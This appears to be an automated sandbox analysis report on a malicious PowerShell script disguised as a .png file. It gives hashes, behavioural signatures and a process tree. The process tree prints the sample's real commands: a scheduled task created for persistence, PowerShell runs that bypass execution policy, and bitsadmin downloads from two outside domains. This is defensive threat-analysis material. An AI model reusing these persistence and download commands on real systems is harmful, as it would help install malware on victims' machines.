Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
29-11-2024 13:42
Static task
static1
Behavioral task
behavioral1
Sample
WRQDouwL.png.ps1
Resource
win7-20240903-en
General
-
Target
WRQDouwL.png.ps1
-
Size
304KB
-
MD5
803d84838415f3c36742821f70203a8f
-
SHA1
e3b4bc28676f9f1c2c71fff706d240e9557df75e
-
SHA256
e20d63d82415c54f408d750f77b1442b4540e1e7eca70cc5e77fc06a093a1eec
-
SHA512
e083ed91c0eb5316d12ba090f2c14ed8a01075ebbb25a47f1f30ef56bf9877556aebb9e12ea0d39ef7ff5fcfd98e43c6c4fdb828936264e5abe75f2620277000
-
SSDEEP
1536:xoXGg/lCHSnPiCqoUZRCHJt50IRNGTRwOs3iFXO57fEPmjwl3Fo5+w5vKBx9SG0W:fmmp
Malware Config
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
bitsadmin.exebitsadmin.exedescription pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3468 2044 bitsadmin.exe 87 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1204 2044 bitsadmin.exe 87 -
Download via BitsAdmin 1 TTPs 2 IoCs
Processes:
bitsadmin.exebitsadmin.exepid Process 3468 bitsadmin.exe 1204 bitsadmin.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
wscript.EXEdescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation wscript.EXE -
Processes:
powershell.exepowershell.exepid Process 4988 powershell.exe 3968 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepid Process 4988 powershell.exe 4988 powershell.exe 3968 powershell.exe 3968 powershell.exe 3968 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid Process Token: SeDebugPrivilege 4988 powershell.exe Token: SeDebugPrivilege 3968 powershell.exe -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
powershell.exewscript.EXEpowershell.exedescription pid Process procid_target PID 4988 wrote to memory of 816 4988 powershell.exe 84 PID 4988 wrote to memory of 816 4988 powershell.exe 84 PID 4988 wrote to memory of 3392 4988 powershell.exe 85 PID 4988 wrote to memory of 3392 4988 powershell.exe 85 PID 892 wrote to memory of 3968 892 wscript.EXE 105 PID 892 wrote to memory of 3968 892 wscript.EXE 105 PID 3968 wrote to memory of 2176 3968 powershell.exe 108 PID 3968 wrote to memory of 2176 3968 powershell.exe 108 PID 3968 wrote to memory of 4720 3968 powershell.exe 111 PID 3968 wrote to memory of 4720 3968 powershell.exe 111 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\WRQDouwL.png.ps11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4988 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /query /FO CSV /v2⤵PID:816
-
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /F /create /sc minute /mo 4 /TN "S0vOpSFCZlK" /ST 07:00 /TR "wscript /nologo /E:vbscript c:\users\Admin\AppData\Roaming\\vOpSFCZlK\XAwvfVMl.rock"2⤵
- Scheduled Task/Job: Scheduled Task
PID:3392
-
-
C:\Windows\system32\wscript.EXEC:\Windows\system32\wscript.EXE /nologo /E:vbscript c:\users\Admin\AppData\Roaming\\vOpSFCZlK\XAwvfVMl.rock1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:892 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -file XAwvfVMl.ps12⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3968 -
C:\Windows\system32\getmac.exe"C:\Windows\system32\getmac.exe" /fo table3⤵PID:2176
-
-
C:\Windows\system32\bitsadmin.exe"C:\Windows\system32\bitsadmin.exe" /reset3⤵PID:4720
-
-
-
C:\Windows\system32\bitsadmin.exebitsadmin /transfer uKCeDl /priority FOREGROUND "https://yjtyhm.eu/topic//0fd09e229b09a55e26856f23dcf78472.html" C:\users\Admin\AppData\Roaming\vOpSFCZlK\0_winlogon.log1⤵
- Process spawned unexpected child process
- Download via BitsAdmin
PID:3468
-
C:\Windows\system32\bitsadmin.exebitsadmin /transfer GxOwMn /priority FOREGROUND "https://nmhholiut.eu/topic//0fd09e229b09a55e26856f23dcf78472.html" C:\users\Admin\AppData\Roaming\vOpSFCZlK\1_winlogon.log1⤵
- Process spawned unexpected child process
- Download via BitsAdmin
PID:1204
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
Filesize
1KB
MD54aaea8e990963328115bd59dee2bcda8
SHA12d7eed0a0a898811d6a149a4545ab3732477c01a
SHA256d9409a92c971fffde4ef29a4777990224d362ae8d847b583a7bd01b5d80394cc
SHA512de1b4cd2633996f20d8967a55c654c902f94080ba4d002c8d7fd473d077b5c26d4b3c8064a3c69a9485074560f25764225f42aadde352633f96326ee521fbd50
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2KB
MD56d22b963b933205f9ff16a8518fd7d09
SHA110edd260dd52819151119e75c8e4d46e75a32949
SHA2560be7b6c78943456988e03e70870bec43b3e808a799b7e622dbcdd28999455ed5
SHA512071d91ea634f9cf39cf85840d48a3c9a063c3ce23e4c1bfd040746452f1ab8dca76daac49a62aa3ec082251a764b889f4ad8fabacdd36cb411593e6edebd559b
-
Filesize
196KB
MD5d4f06b258da41c8260fe07e2bc280953
SHA1046a98fa4b8e4b44914884c1525c2c787c98cfa4
SHA256b89c2c4c38917239929a94d79f86076f61dde3029fb514fdc7944d7b0114a455
SHA5123bc6231d0d5aebad5f3dc45ff6c9b9391ebab51ea004acadd4b9cea96fab91a2274a04d65ca76c431048303cb2405178fcfb989db7bbac95a10ccbf42c4ce660
-
Filesize
1KB
MD5a42520d036314591d61ecb810833a0f4
SHA1f45f63c60562aadd137fe5f23d37ec5d8a1c54da
SHA256f2d2cc6bb0b77ef031d0508acb99b4c12b95ff3eff76d33aeb40b8c8695146ea
SHA51235a13ed9c17b1659f9c53ce4f53048f3dcf6e790a1b74bdcf174d3a625ad9db2e04da491f74d735bfabec54c2c7981c73ac516fe5612995836c179f792e73a9b
-
Filesize
930B
MD5c4a3c0d1b98d69d3172259cdb5ac539f
SHA162403e500a90ca08210445310423c5889cf04acc
SHA256b7221f4d2a2d828ae14d1ad8ec9bec78e6d9c096d3af89cea6aaaa8b9faa4667
SHA5120e266694d90d14683486cde0032037cb8899078d291f8cd415cf7590d1b25eb1a1c6714de74445f5e7e6a728e5e69eb8b54e9d26351431058da3f7b06b26a01e